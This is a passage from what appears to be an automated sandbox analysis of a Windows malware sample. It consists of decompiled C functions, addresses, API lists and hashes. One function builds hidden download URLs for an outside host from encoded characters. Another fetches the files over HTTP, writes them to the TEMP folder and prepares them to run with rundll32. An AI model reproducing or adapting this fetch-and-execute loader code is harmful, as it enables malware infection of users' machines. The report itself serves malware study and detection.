						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x004048f3
0x004048fc
0x00404907
0x0040490a
0x0040490d
0x0040491f
0x00404925
0x00404928
0x0040492b
0x0040492f
0x00404933
0x00404936
0x00404a9b
0x00404aa1
0x00404aa4
0x00404aa7
0x00404aaa
0x00404aad
0x00404ab4
0x00404aba
0x00404abb
0x00404abe
0x00404ac1
0x00404ac5
0x00404ac5
0x00404ac6
0x00404aca
0x00404ad6
0x00404ad7
0x00404ada
0x00404ade
0x00404ade
0x00404ae2
0x00404ae5
0x00404ae7
0x00404aea
0x00404b0a
0x00404b14
0x00404b14
0x00404b18
0x00404b1a
0x00404b21
0x00404b21
0x00404b23
0x00404b25
0x00404b28
0x00404b28
0x00404b28
0x00404b28
0x00404aec
0x00404af5
0x00404af9
0x00404afb
0x00404aff
0x00404aff
0x00404b01
0x00404b06
0x00404b06
0x00404b01
0x00404b2b
0x00404b2b
0x00404b34
0x00404b3d
0x00404b43
0x00404b46
0x00404b4c
0x00404b4d
0x00404b50
0x00404b54
0x00404b54
0x00404b50
0x00404b55
0x00404b5c
0x00404b5f
0x00404b62
0x00404b65
0x00404b6b
0x00404b71
0x00404b74
0x00404b76
0x00404b7a
0x00404b7d
0x00404b80
0x00404b80
0x00404b82
0x00404b86
0x00404ba9
0x00404bad
0x00404bb9
0x00404bbc
0x00404bbc
0x00404bbc
0x00404bbc
0x00404bbf
0x00404bc6
0x00404bc9
0x00404b88
0x00404b88
0x00404b8c
0x00404b97
0x00404b9a
0x00404b9a
0x00404b9a
0x00404b9c
0x00404ba0
0x00404ba5
0x00404ba5
0x00404bd0
0x00404bd0
0x00404bd0
0x00404bd2
0x00404bd5
0x00404bd7
0x00404bd7
0x00404bdb
0x00404bdd
0x00000000
0x00404bdd
0x0040493f
0x00000000
0x0040494f
0x00404955
0x00404959
0x0040495c
0x00404960
0x00404961
0x00404961
0x0040496a
0x0040496f
0x0040499d
0x004049a1
0x004049a3
0x004049aa
0x004049aa
0x004049ac
0x004049ae
0x004049b1
0x004049b1
0x004049b1
0x004049b1
0x00404971
0x0040497b
0x0040497f
0x00404981
0x00404985
0x00404987
0x0040498c
0x0040498c
0x00404987
0x0040496f
0x004049ba
0x004049c3
0x004049cb
0x004049d2
0x00404a82
0x004049d8
0x004049e1
0x004049e2
0x004049e9
0x004049ed
0x004049ed
0x004049f1
0x004049f4
0x004049fa
0x004049fd
0x00404a00
0x00404a03
0x00404a09
0x00404a12
0x00404a14
0x00404a1b
0x00404a1e
0x00404a20
0x00404a24
0x00404a47
0x00404a4b
0x00404a4d
0x00404a57
0x00404a5a
0x00404a5a
0x00404a5a
0x00404a5a
0x00404a5d
0x00404a64
0x00404a64
0x00404a67
0x00404a26
0x00404a2a
0x00404a38
0x00404a38
0x00404a3a
0x00404a3e
0x00404a43
0x00404a43
0x00404a6e
0x00404a6e
0x00404a70
0x00404a73
0x00404a76
0x00404a7a
0x00404a7c
0x00404a7c
0x00404a85
0x00404a88
0x00404a8b
0x00000000
0x00404a8b

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: 3b5296033baacfac2efda97847c6edef399ae63c2ce524e50002220949bcfe8b
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 7BB17EB5A00206DFDB15CF14C5D0AA9BBA1FB88318F14C1AED95A5B382D735FE42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD0, Relevance: 73.6, APIs: 3, Strings: 39, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401FD0() {
				short _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				short _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				short _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				short _v700;
				short _v704;
				short _v708;
				short _t56;
				void* _t62;
				void* _t64;
				short _t67;
				short* _t76;

				_t76 =  &_v708;
				goto L1;
				do {
					do {
						L1:
						_t56 = L"25"; // 0x350032
						_t67 =  *0x40a0d4; // 0x0
						_v708 = _t56;
						_v676 = 0x740068;
						_v672 = 0x700074;
						_v668 = 0x3a0073;
						_v664 = 0x2f002f;
						_v660 = 0x2e0061;
						_v656 = 0x6f0067;
						_v652 = 0x740061;
						_v648 = 0x610067;
						_v644 = 0x65006d;
						_v640 = 0x63002e;
						_v636 = 0x2f006f;
						_v632 = 0x730075;
						_v628 = 0x720065;
						_v624 = 0x2f0066;
						_v620 = 0x610064;
						_v616 = 0x2f0074;
						_v612 = 0;
						_v704 = _t67;
						_v700 = 0x73002f;
						_v696 = 0x6c0071;
						_v692 = 0x740069;
						_v688 = 0x2e0065;
						_v684 = 0x610064;
						_v680 = 0x74;
						lstrcatW( &_v520,  &_v676);
						lstrcatW( &_v520,  &_v708);
						lstrcatW( &_v520,  &_v700);
						_t62 = E00401980( &_v520, 1);
						_t76 =  &(_t76[4]);
					} while (_t62 == 0);
					_v608 = 0x740068;
					_v604 = 0x700074;
					_v600 = 0x3a0073;
					_v596 = 0x2f002f;
					_v592 = 0x2e0061;
					_v588 = 0x6f0067;
					_v584 = 0x740061;
					_v580 = 0x610067;
					_v576 = 0x65006d;
					_v572 = 0x63002e;
					_v568 = 0x2f006f;
					_v564 = 0x730075;
					_v560 = 0x720065;
					_v556 = 0x2f0066;
					_v552 = 0x610064;
					_v548 = 0x2f0074;
					_v544 = 0x710073;
					_v540 = 0x69006c;
					_v536 = 0x650074;
					_v532 = 0x64002e;
					_v528 = 0x6c006c;
					_v524 = 0;
					_t64 = E00401980( &_v608, 2);
					_t76 =  &(_t76[4]);
				} while (_t64 == 0);
				_push(0x40cb38);
				_push(L"rundll32.exe");
				return E00401050();
			}

0x00401fd0
0x00401fea
0x00401fec
0x00401fec
0x00401fec
0x00401fec
0x00401ff1
0x00401ff8
0x00402009
0x00402011
0x00402019
0x00402021
0x00402029
0x00402031
0x00402039
0x00402041
0x00402049
0x00402051
0x00402059
0x00402061
0x00402069
0x00402071
0x00402079
0x0040207d
0x00402081
0x00402085
0x0040208a
0x00402092
0x0040209a
0x004020a2
0x004020aa
0x004020ae
0x004020b6
0x004020c5
0x004020d4
0x004020e0
0x004020e5
0x004020e8
0x004020f7
0x004020ff
0x0040210a
0x00402115
0x00402120
0x0040212b
0x00402136
0x00402141
0x0040214c
0x00402157
0x00402162
0x0040216d
0x00402178
0x00402183
0x0040218e
0x00402195
0x0040219c
0x004021a7
0x004021b2
0x004021bd
0x004021c8
0x004021d3
0x004021da
0x004021df
0x004021e2
0x004021ea
0x004021ef
0x00402206

APIs

lstrcatW.KERNEL32 ref: 004020B6
lstrcatW.KERNEL32(?,?), ref: 004020C5
lstrcatW.KERNEL32(?,?), ref: 004020D4

Part of subcall function 00401980: LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,74B482B0), ref: 004019B7
Part of subcall function 00401980: GetProcAddress.KERNEL32(00000000), ref: 004019BE
Part of subcall function 00401980: SysAllocString.OLEAUT32(?), ref: 00401A47

Strings

a, xrefs: 00402039
m, xrefs: 0040214C
e, xrefs: 00402178
/, xrefs: 00402115
f, xrefs: 00402183
t, xrefs: 004021B2
a, xrefs: 00402029
a, xrefs: 00402120
/, xrefs: 00402021
e, xrefs: 00402069
t, xrefs: 00402011
g, xrefs: 00402041
., xrefs: 00402157
e, xrefs: 004020A2
t, xrefs: 004020FF
t, xrefs: 004020AE
q, xrefs: 00402092
u, xrefs: 0040216D
l, xrefs: 004021A7
i, xrefs: 0040209A
/, xrefs: 0040208A
h, xrefs: 00402009
g, xrefs: 00402141
., xrefs: 00402051
rundll32.exe, xrefs: 004021EF
a, xrefs: 00402136
s, xrefs: 00402019
o, xrefs: 00402162
m, xrefs: 00402049
o, xrefs: 00402059
f, xrefs: 00402071
u, xrefs: 00402061
s, xrefs: 0040210A
., xrefs: 004021BD
g, xrefs: 00402031
h, xrefs: 004020F7
g, xrefs: 0040212B
s, xrefs: 0040219C
l, xrefs: 004021C8

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$AddressAllocLibraryLoadProcString
String ID: .$.$.$/$/$/$a$a$a$a$e$e$e$f$f$g$g$g$g$h$h$i$l$l$m$m$o$o$q$rundll32.exe$s$s$s$t$t$t$t$u$u
API String ID: 2515409318-2062937538
Opcode ID: 8f864ac3687296d7bd065da5814715d3cd2f59a65372d2eb1aee6f7aacca891d
Instruction ID: 94f93bd35c47668ddd46f7dbdeea39e45e68a997e564552175ff46278fcdb505
Opcode Fuzzy Hash: 8f864ac3687296d7bd065da5814715d3cd2f59a65372d2eb1aee6f7aacca891d
Instruction Fuzzy Hash: 4441DAB4509384DEE320DF51D448B9BFBE6FB85B48F00492DE68856251D7F6818CCF66

Uniqueness

Uniqueness Score: -1.00%

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401980(intOrPtr _a4, intOrPtr _a8) {
				long _v28;
				signed int _v36;
				char _v56;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v120;
				signed int _v132;
				intOrPtr* _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				long _v616;
				intOrPtr _v636;
				void* _v640;
				intOrPtr* _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				struct _OVERLAPPED* _v652;
				struct _OVERLAPPED* _v656;
				intOrPtr* _v660;
				short _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				char _v676;
				struct _OVERLAPPED* _v680;
				intOrPtr _v684;
				char _v688;
				short _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				long _v704;
				intOrPtr* _v708;
				char _v712;
				intOrPtr _v716;
				char _v724;
				char _v728;
				long _v740;
				void* _v744;
				intOrPtr _v756;
				intOrPtr _v760;
				_Unknown_base(*)()* _t107;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr* _t121;
				int _t124;
				intOrPtr* _t130;
				intOrPtr _t149;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr* _t176;
				intOrPtr _t179;
				intOrPtr _t195;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr _t208;
				WCHAR* _t212;
				void* _t213;
				signed int _t215;
				signed int _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				intOrPtr* _t220;

				_t216 = _t215 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00407B9D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t216;
				_t217 = _t216 - 0x274;
				_v616 = 0;
				_v640 = 0;
				_t107 = GetProcAddress(LoadLibraryA("ole32"), "CoCreateInstance");
				_push( &_v640);
				_push(0x40a080);
				_push(0x17);
				_push(0);
				_push(0x40a070);
				if( *_t107() < 0) {
					L45:
					 *[fs:0x0] = _v36;
					return _v636;
				} else {
					_t174 =  *0x40d2b8; // 0x0
					_t110 =  *0x40d2bc; // 0x0
					_t156 =  *0x40d2c0; // 0x80020004
					_v616 = _t174;
					_t175 =  *0x40d2c4; // 0x0
					_v648 = 0x47;
					_v647 = 0x45;
					_v646 = 0x54;
					_v645 = 0;
					_v612 = _t110;
					_v608 = _t156;
					_v604 = _t175;
					_t206 = E0040225B(0xc);
					_t218 = _t217 + 4;
					_v640 = _t206;
					_t195 = _a4;
					_v28 = 0;
					if(_t206 == 0) {
						_t206 = 0;
					} else {
						 *((intOrPtr*)(_t206 + 4)) = 0;
						 *(_t206 + 8) = 1;
						__imp__#2(_t195);
						 *_t206 = 0;
						if(0 == 0 && _t195 != 0) {
							E00407633(0x8007000e);
						}
					}
					_v644 = _t206;
					_v28 = 0xffffffff;
					_v640 = _t206;
					if(_t206 == 0) {
						E00407633(0x8007000e);
					}
					_v28 = 1;
					if(_t206 == 0) {
						_v656 = 0;
					} else {
						_v656 =  *_t206;
					}
					_t207 = E0040225B(0xc);
					_t219 = _t218 + 4;
					_v652 = _t207;
					_v28 = 2;
					if(_t207 == 0) {
						_t207 = 0;
					} else {
						 *(_t207 + 4) = 0;
						 *(_t207 + 8) = 1;
						_t149 = E004076E0( &_v648,  &_v648);
						 *_t207 = _t149;
						if(_t149 == 0) {
							E00407633(0x8007000e);
						}
					}
					_v28 = 1;
					_v600 = _t207;
					if(_t207 == 0) {
						E00407633(0x8007000e);
					}
					_v28 = 3;
					if(_t207 == 0) {
						_v652 = 0;
					} else {
						_v652 =  *_t207;
					}
					_t220 = _t219 - 0x10;
					_t176 = _t220;
					_t114 = _v660;
					 *_t176 = _v616;
					 *((intOrPtr*)(_t176 + 4)) = _v612;
					 *((intOrPtr*)(_t176 + 8)) = _v608;
					 *((intOrPtr*)(_t176 + 0xc)) = _v604;
					_t200 =  *((intOrPtr*)( *_t114 + 0x24))(_t114, _v652, _v656);
					_v56 = 1;
					if(_t207 != 0) {
						_t45 = _t207 + 8; // 0x8
						if(InterlockedDecrement(_t45) == 0) {
							E00401E20(_t207);
							E00402250(_t207);
							_t220 = _t220 + 4;
						}
					}
					_t208 = _v672;
					_v56 = 0xffffffff;
					if(_t208 != 0 && InterlockedDecrement(_t208 + 8) == 0) {
						E00401E20(_t208);
						E00402250(_t208);
						_t220 = _t220 + 4;
					}
					if(_t200 < 0) {
						L44:
						_t116 = _v688;
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						goto L45;
					} else {
						_t118 =  *0x40d2b8; // 0x0
						_t159 =  *0x40d2bc; // 0x0
						_t179 =  *0x40d2c0; // 0x80020004
						_t201 = _t220 - 0x10;
						 *_t201 = _t118;
						_t119 =  *0x40d2c4; // 0x0
						 *((intOrPtr*)(_t201 + 4)) = _t159;
						 *((intOrPtr*)(_t201 + 8)) = _t179;
						_push(_v688);
						 *((intOrPtr*)(_t201 + 0xc)) = _t119;
						if( *((intOrPtr*)( *_v688 + 0x34))() < 0) {
							goto L44;
						} else {
							_t121 = _v708;
							 *((intOrPtr*)( *_t121 + 0x38))(_t121,  &_v692);
							if(_v700 != 0xc8) {
								goto L44;
							} else {
								_t124 = E00401E70(_v716,  &_v688);
								_v88 = 4;
								if(_v692 != 0x2011) {
									L42:
									_v84 = 0xffffffff;
									__imp__#9( &_v688);
									if(_t124 < 0) {
										E00407633(_t124);
									}
									goto L44;
								} else {
									__imp__#17(_v680);
									if(_t124 != 1) {
										goto L42;
									} else {
										__imp__#20(_v684, _t124,  &_v712);
										__imp__#19(_v696, 1,  &_v728);
										_v740 = _v740 + 1;
										__imp__#23(_v708,  &_v724);
										_t212 = E0040263E(_a4, 0x2f) + 2;
										_v688 = 0x450054;
										_v684 = 0x50004d;
										_v680 = 0;
										_v676 = 0x45746547;
										_v672 = 0x7269766e;
										_v668 = 0x656d6e6f;
										_v664 = 0x6156746e;
										_v660 = 0x62616972;
										_v656 = 0x57656c;
										_t130 = E00401000( &_v676);
										if(_t130 != 0) {
											_push(0x104);
											_push( &_v652);
											_push( &_v688);
											if( *_t130() != 0) {
												lstrcatW( &_v664, "\\");
												lstrcatW( &_v664, _t212);
												_t212 =  &_v664;
											}
											if(_a8 == 2) {
												wsprintfW(0x40cb38, L"\"%s\",global", _t212);
											}
											_t124 = CreateFileW(_t212, 0x40000000, 0, 0, 2, 0x80, 0);
											_t213 = _t124;
											if(_t213 != 0xffffffff) {
												WriteFile(_t213, _v744, _v760 - _v756,  &_v704, 0);
												_v740 = 1;
												_t124 = CloseHandle(_t213);
											}
											__imp__#24(_v728);
											goto L42;
										} else {
											_v120 = 0xffffffff;
											__imp__#9( &_v724);
											if(_t130 < 0) {
												E00407633(_t130);
											}
											 *[fs:0x0] = _v132;
											return 0;
										}
									}
								}
							}
						}
					}
				}
			}

0x00401983
0x00401986
0x00401988
0x00401993
0x00401994
0x0040199b
0x004019af
0x004019b3
0x004019be
0x004019c8
0x004019c9
0x004019ce
0x004019d0
0x004019d2
0x004019db
0x00401df9
0x00401e05
0x00401e10
0x004019e1
0x004019e1
0x004019e7
0x004019ec
0x004019f2
0x004019f6
0x004019fe
0x00401a03
0x00401a08
0x00401a0d
0x00401a12
0x00401a16
0x00401a1a
0x00401a23
0x00401a25
0x00401a28
0x00401a2c
0x00401a33
0x00401a3a
0x00401a63
0x00401a3c
0x00401a3d
0x00401a40
0x00401a47
0x00401a4f
0x00401a51
0x00401a5c
0x00401a5c
0x00401a51
0x00401a67
0x00401a6b
0x00401a76
0x00401a7a
0x00401a81
0x00401a81
0x00401a88
0x00401a93
0x00401a9d
0x00401a95
0x00401a97
0x00401a97
0x00401aac
0x00401aae
0x00401ab1
0x00401ab7
0x00401abf
0x00401aeb
0x00401ac1
0x00401ac5
0x00401acd
0x00401ad4
0x00401adb
0x00401add
0x00401ae4
0x00401ae4
0x00401add
0x00401aef
0x00401af7
0x00401afb
0x00401b02
0x00401b02
0x00401b09
0x00401b11
0x00401b1b
0x00401b13
0x00401b15
0x00401b15
0x00401b27
0x00401b2a
0x00401b2c
0x00401b30
0x00401b38
0x00401b3f
0x00401b46
0x00401b59
0x00401b5b
0x00401b63
0x00401b65
0x00401b71
0x00401b75
0x00401b7b
0x00401b80
0x00401b80
0x00401b71
0x00401b83
0x00401b87
0x00401b94
0x00401ba6
0x00401bac
0x00401bb1
0x00401bb1
0x00401bb6
0x00401def
0x00401def
0x00401df6
0x00000000
0x00401bbc
0x00401bbc
0x00401bc1
0x00401bca
0x00401bd4
0x00401bd8
0x00401bda
0x00401bdf
0x00401be2
0x00401be9
0x00401bea
0x00401bf2
0x00000000
0x00401bf8
0x00401bf8
0x00401c04
0x00401c0f
0x00000000
0x00401c15
0x00401c1e
0x00401c2a
0x00401c35
0x00401dcf
0x00401dd3
0x00401ddf
0x00401de7
0x00401dea
0x00401dea
0x00000000
0x00401c3b
0x00401c40
0x00401c49
0x00000000
0x00401c4f
0x00401c5a
0x00401c6c
0x00401c81
0x00401c85
0x00401c9d
0x00401ca0
0x00401ca8
0x00401cb0
0x00401cb8
0x00401cc0
0x00401cc8
0x00401cd0
0x00401cd8
0x00401ce0
0x00401ce8
0x00401cf2
0x00401d2e
0x00401d37
0x00401d38
0x00401d3d
0x00401d4f
0x00401d57
0x00401d59
0x00401d59
0x00401d61
0x00401d6e
0x00401d74
0x00401d8a
0x00401d90
0x00401d95
0x00401daf
0x00401db6
0x00401dbe
0x00401dbe
0x00401dc9
0x00000000
0x00401cf4
0x00401cf8
0x00401d04
0x00401d0c
0x00401d0f
0x00401d0f
0x00401d1d
0x00401d29
0x00401d29
0x00401cf2
0x00401c49
0x00401c35
0x00401c0f
0x00401bf2
0x00401bb6

APIs

LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,74B482B0), ref: 004019B7
GetProcAddress.KERNEL32(00000000), ref: 004019BE
SysAllocString.OLEAUT32(?), ref: 00401A47
InterlockedDecrement.KERNEL32(00000008), ref: 00401B69
InterlockedDecrement.KERNEL32(?), ref: 00401B9A
SafeArrayGetDim.OLEAUT32(?), ref: 00401C40
SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 00401C5A
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00401C6C
SafeArrayAccessData.OLEAUT32(?,?), ref: 00401C85
VariantClear.OLEAUT32(?), ref: 00401D04
lstrcatW.KERNEL32(?,0040A06C), ref: 00401D4F
lstrcatW.KERNEL32(?,-00000002), ref: 00401D57
wsprintfW.USER32 ref: 00401D6E
CreateFileW.KERNEL32(-00000002,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401D8A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401DAF
CloseHandle.KERNEL32 ref: 00401DBE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00401DC9
VariantClear.OLEAUT32(00002011), ref: 00401DDF

Strings

GetE, xrefs: 00401CB8
ole32, xrefs: 004019AA
T, xrefs: 00401CA0
ntVa, xrefs: 00401CD0
CoCreateInstance, xrefs: 004019A5
T, xrefs: 00401A08
riab, xrefs: 00401CD8
"%s",global, xrefs: 00401D64
M, xrefs: 00401CA8
leW, xrefs: 00401CE0
G, xrefs: 004019FE
onme, xrefs: 00401CC8
E, xrefs: 00401A03
nvir, xrefs: 00401CC0

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundClearDataDecrementFileInterlockedVariantlstrcat$AccessAddressAllocCloseCreateHandleLibraryLoadProcStringUnaccessWritewsprintf
String ID: "%s",global$CoCreateInstance$E$G$GetE$M$T$T$leW$ntVa$nvir$ole32$onme$riab
API String ID: 895335699-2275290888
Opcode ID: 5e746ada17a097ae99fe4af7f44687cd509173ca61491f0219b61594ec2a5691
Instruction ID: 6257b2323d03b648742c763a37ac7d4c88d4c1fab92b2dc60e61fb4d6374e78a
Opcode Fuzzy Hash: 5e746ada17a097ae99fe4af7f44687cd509173ca61491f0219b61594ec2a5691
Instruction Fuzzy Hash: 39D191715087419FC320DF64C944B5BBBE4BF88714F108A2EF595A73A0D778E905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406967, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00406967(int _a4, int _a8, signed char _a9, char* _a12, char _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				char _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x408588);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x40d168; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t3 =  &_a16; // 0x406d59
						_t83 = E00406B8B(_a12,  *_t3);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x40d168; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x40d160; // 0x0
								_a28 = _t82;
							}
							_t14 =  &_a16; // 0x406d59
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12,  *_t14, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406590(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0) {
									goto L21;
								} else {
									_t27 =  &_a16; // 0x406d59
									if(MultiByteToWideChar(_a28, 1, _a12,  *_t27, _v40, _t88) == 0) {
										goto L21;
									} else {
										_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
										_v44 = _t99;
										if(_t99 == 0) {
											goto L21;
										} else {
											if((_a9 & 0x00000004) == 0) {
												_v8 = 1;
												E00406590(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
												_v28 = _t102;
												_t89 = _t102;
												_v36 = _t89;
												_v8 = _v8 | 0xffffffff;
												if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
													goto L21;
												} else {
													_push(0);
													_push(0);
													if(_a24 != 0) {
														_push(_a24);
														_push(_a20);
													} else {
														_push(0);
														_push(0);
													}
													_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
													if(_t99 == 0) {
														goto L21;
													} else {
														goto L30;
													}
												}
											} else {
												if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
													L30:
													_t62 = _t99;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t8 =  &_a16; // 0x406d59
						_t62 = LCMapStringA(_a4, _a8, _a12,  *_t8, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x408580, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40857c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x40d168 = 2;
							goto L5;
						}
					} else {
						 *0x40d168 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0040696a
0x0040696c
0x00406971
0x0040697c
0x0040697d
0x00406984
0x0040698a
0x0040698f
0x00406995
0x004069dd
0x004069e0
0x004069e2
0x004069e8
0x004069ee
0x004069ef
0x004069ef
0x004069f2
0x004069fa
0x00406a1c
0x00000000
0x00406a22
0x00406a25
0x00406a27
0x00406a2c
0x00406a2c
0x00406a31
0x00406a3c
0x00406a4c
0x00406a4e
0x00406a53
0x00000000
0x00406a59
0x00406a59
0x00406a64
0x00406a69
0x00406a6e
0x00406a71
0x00406a8d
0x00000000
0x00406a8f
0x00406a93
0x00406aa6
0x00000000
0x00406aa8
0x00406aba
0x00406abc
0x00406ac1
0x00000000
0x00406ac3
0x00406ac7
0x00406b09
0x00406b18
0x00406b1d
0x00406b20
0x00406b22
0x00406b25
0x00406b3f
0x00000000
0x00406b59
0x00406b5c
0x00406b5d
0x00406b5e
0x00406b64
0x00406b67
0x00406b60
0x00406b60
0x00406b61
0x00406b61
0x00406b7a
0x00406b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b7e
0x00406ac9
0x00406acc
0x00406b84
0x00406b84
0x00000000
0x00000000
0x00000000
0x00406acc
0x00406ac7
0x00406ac1
